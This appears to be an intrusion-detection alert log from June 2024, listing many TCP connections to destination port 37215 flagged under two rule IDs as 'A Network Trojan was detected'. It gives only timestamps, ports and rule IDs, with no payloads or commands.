              Timestamp:06/13/24-21:33:09.090763
              SID:2829579
              Source Port:53520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440382
              SID:2829579
              Source Port:43712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991111
              SID:2835222
              Source Port:52400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039876
              SID:2835222
              Source Port:43194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257463
              SID:2835222
              Source Port:42142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457777
              SID:2829579
              Source Port:40708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754652
              SID:2829579
              Source Port:42438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454181
              SID:2835222
              Source Port:49820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.304537
              SID:2829579
              Source Port:45350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212207
              SID:2829579
              Source Port:37466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730152
              SID:2829579
              Source Port:36574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941278
              SID:2835222
              Source Port:50180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.268235
              SID:2835222
              Source Port:42178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373392
              SID:2829579
              Source Port:47108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993784
              SID:2829579
              Source Port:35404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632568
              SID:2835222
              Source Port:57380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.971034
              SID:2835222
              Source Port:53004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782429
              SID:2835222
              Source Port:49704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092593
              SID:2829579
              Source Port:35364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424593
              SID:2829579
              Source Port:58650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.059662
              SID:2829579
              Source Port:53310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238906
              SID:2835222
              Source Port:35186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.380493
              SID:2835222
              Source Port:53630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458068
              SID:2835222
              Source Port:53854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126249
              SID:2829579
              Source Port:35238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711454
              SID:2835222
              Source Port:53114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.315847
              SID:2829579
              Source Port:50020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.297641
              SID:2835222
              Source Port:34818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832726
              SID:2835222
              Source Port:53332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694983
              SID:2829579
              Source Port:46670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758360
              SID:2835222
              Source Port:36748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.379641
              SID:2829579
              Source Port:35718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106783
              SID:2829579
              Source Port:49712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.450849
              SID:2829579
              Source Port:57054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265932
              SID:2835222
              Source Port:58446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375066
              SID:2829579
              Source Port:36758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298630
              SID:2829579
              Source Port:57884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474109
              SID:2835222
              Source Port:45056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028125
              SID:2829579
              Source Port:53050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886283
              SID:2829579
              Source Port:41946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912084
              SID:2835222
              Source Port:47326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989897
              SID:2835222
              Source Port:60468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223413
              SID:2829579
              Source Port:47046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608507
              SID:2835222
              Source Port:42640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403559
              SID:2835222
              Source Port:50732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544208
              SID:2829579
              Source Port:39588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569006
              SID:2829579
              Source Port:47938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726310
              SID:2835222
              Source Port:41988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418245
              SID:2829579
              Source Port:36746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729387
              SID:2829579
              Source Port:40350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123412
              SID:2829579
              Source Port:37294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273144
              SID:2829579
              Source Port:36602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711043
              SID:2835222
              Source Port:43426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.102419
              SID:2835222
              Source Port:53374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014912
              SID:2829579
              Source Port:37558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301564
              SID:2835222
              Source Port:43426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838192
              SID:2829579
              Source Port:45896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294385
              SID:2835222
              Source Port:41722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546907
              SID:2829579
              Source Port:37622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274009
              SID:2829579
              Source Port:50340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675331
              SID:2835222
              Source Port:55406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214577
              SID:2835222
              Source Port:60520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.423181
              SID:2829579
              Source Port:53808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485370
              SID:2835222
              Source Port:42112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097627
              SID:2829579
              Source Port:53500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.046271
              SID:2835222
              Source Port:41212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801945
              SID:2829579
              Source Port:43088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888071
              SID:2829579
              Source Port:34920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707910
              SID:2829579
              Source Port:42306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111578
              SID:2835222
              Source Port:55644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669606
              SID:2829579
              Source Port:36488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306269
              SID:2829579
              Source Port:46564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695271
              SID:2829579
              Source Port:59128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176152
              SID:2829579
              Source Port:39250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805219
              SID:2835222
              Source Port:36950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375780
              SID:2835222
              Source Port:46696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153010
              SID:2835222
              Source Port:58072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277920
              SID:2835222
              Source Port:47686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836540
              SID:2835222
              Source Port:34936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886658
              SID:2835222
              Source Port:42520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.843800
              SID:2829579
              Source Port:33820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076033
              SID:2835222
              Source Port:52126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043531
              SID:2835222
              Source Port:46950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.300562
              SID:2829579
              Source Port:44078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194534
              SID:2829579
              Source Port:47184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632907
              SID:2835222
              Source Port:59146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.420311
              SID:2829579
              Source Port:47068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377769
              SID:2835222
              Source Port:39998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043948
              SID:2829579
              Source Port:36524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408142
              SID:2835222
              Source Port:49120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344023
              SID:2835222
              Source Port:33460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349673
              SID:2829579
              Source Port:58522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783985
              SID:2835222
              Source Port:38398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822822
              SID:2835222
              Source Port:32972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344952
              SID:2829579
              Source Port:55784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552629
              SID:2829579
              Source Port:55166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630956
              SID:2829579
              Source Port:53690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731728
              SID:2835222
              Source Port:50228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310010
              SID:2829579
              Source Port:34104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165568
              SID:2835222
              Source Port:45932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936581
              SID:2829579
              Source Port:34758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089078
              SID:2835222
              Source Port:55530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678815
              SID:2835222
              Source Port:47466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568352
              SID:2835222
              Source Port:49040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.783627
              SID:2829579
              Source Port:56380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418865
              SID:2835222
              Source Port:41274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822109
              SID:2835222
              Source Port:48098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868549
              SID:2829579
              Source Port:45276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076411
              SID:2829579
              Source Port:39588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.196464
              SID:2835222
              Source Port:46956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565231
              SID:2829579
              Source Port:40944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784496
              SID:2829579
              Source Port:42808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298952
              SID:2829579
              Source Port:45864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.376218
              SID:2835222
              Source Port:37334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.232021
              SID:2835222
              Source Port:57342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611048
              SID:2829579
              Source Port:53626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553984
              SID:2829579
              Source Port:42998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258841
              SID:2835222
              Source Port:33770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708713
              SID:2829579
              Source Port:49530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093325
              SID:2829579
              Source Port:57560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993459
              SID:2835222
              Source Port:33616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695790
              SID:2835222
              Source Port:47232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091563
              SID:2835222
              Source Port:60740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.101674
              SID:2829579
              Source Port:54606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401874
              SID:2835222
              Source Port:51194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711537
              SID:2835222
              Source Port:33504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709644
              SID:2835222
              Source Port:38780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.154928
              SID:2835222
              Source Port:42614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.968879
              SID:2829579
              Source Port:36638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457667
              SID:2829579
              Source Port:34066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452956
              SID:2835222
              Source Port:38396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377715
              SID:2835222
              Source Port:59348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027041
              SID:2835222
              Source Port:32876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100577
              SID:2829579
              Source Port:60352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308266
              SID:2835222
              Source Port:40542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612465
              SID:2835222
              Source Port:34166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503138
              SID:2829579
              Source Port:39600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838385
              SID:2835222
              Source Port:45850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672785
              SID:2829579
              Source Port:38920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.073752
              SID:2829579
              Source Port:45194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.267309
              SID:2829579
              Source Port:45474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245389
              SID:2835222
              Source Port:35244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402963
              SID:2829579
              Source Port:59554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374551
              SID:2829579
              Source Port:53446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802436
              SID:2835222
              Source Port:52830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993193
              SID:2829579
              Source Port:47540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868403
              SID:2829579
              Source Port:47000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.024615
              SID:2829579
              Source Port:57340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.024258
              SID:2835222
              Source Port:42136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.297398
              SID:2829579
              Source Port:33114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041593
              SID:2829579
              Source Port:39906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941491
              SID:2835222
              Source Port:51612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709918
              SID:2829579
              Source Port:60304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372891
              SID:2829579
              Source Port:48042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275513
              SID:2829579
              Source Port:35164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568166
              SID:2835222
              Source Port:52144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800923
              SID:2835222
              Source Port:45298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075000
              SID:2835222
              Source Port:47864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.674697
              SID:2829579
              Source Port:40890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124946
              SID:2829579
              Source Port:54922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041511
              SID:2829579
              Source Port:36980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731171
              SID:2835222
              Source Port:54704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782042
              SID:2835222
              Source Port:39626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349281
              SID:2829579
              Source Port:52620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402575
              SID:2829579
              Source Port:55130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227718
              SID:2829579
              Source Port:35476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307743
              SID:2835222
              Source Port:34056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488574
              SID:2829579
              Source Port:58860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458938
              SID:2829579
              Source Port:34936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437051
              SID:2835222
              Source Port:54770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359597
              SID:2829579
              Source Port:33804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528524
              SID:2835222
              Source Port:51998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553507
              SID:2829579
              Source Port:52030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.218091
              SID:2835222
              Source Port:54998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257762
              SID:2835222
              Source Port:47794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011269
              SID:2835222
              Source Port:51018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832679
              SID:2835222
              Source Port:59014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911017
              SID:2829579
              Source Port:47940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025943
              SID:2835222
              Source Port:36756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.937248
              SID:2835222
              Source Port:49570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.549866
              SID:2829579
              Source Port:46880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.929671
              SID:2835222
              Source Port:60110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527617
              SID:2835222
              Source Port:50334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729243
              SID:2829579
              Source Port:33748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885571
              SID:2829579
              Source Port:45632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568447
              SID:2835222
              Source Port:56666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265403
              SID:2829579
              Source Port:36488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.273949
              SID:2835222
              Source Port:55146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013464
              SID:2829579
              Source Port:38652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.304327
              SID:2829579
              Source Port:46752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085159
              SID:2829579
              Source Port:52194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.138063
              SID:2835222
              Source Port:49866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124799
              SID:2835222
              Source Port:47402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403139
              SID:2829579
              Source Port:36500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.935990
              SID:2835222
              Source Port:38322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.017326
              SID:2829579
              Source Port:53656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075731
              SID:2835222
              Source Port:49422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418804
